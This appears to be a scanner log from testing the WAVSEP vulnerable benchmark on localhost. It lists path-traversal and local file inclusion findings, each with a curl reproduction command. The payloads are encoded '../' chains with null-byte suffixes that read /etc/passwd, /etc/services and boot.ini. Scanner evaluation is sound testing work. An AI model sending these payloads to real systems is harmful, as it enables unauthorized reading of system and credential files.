curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
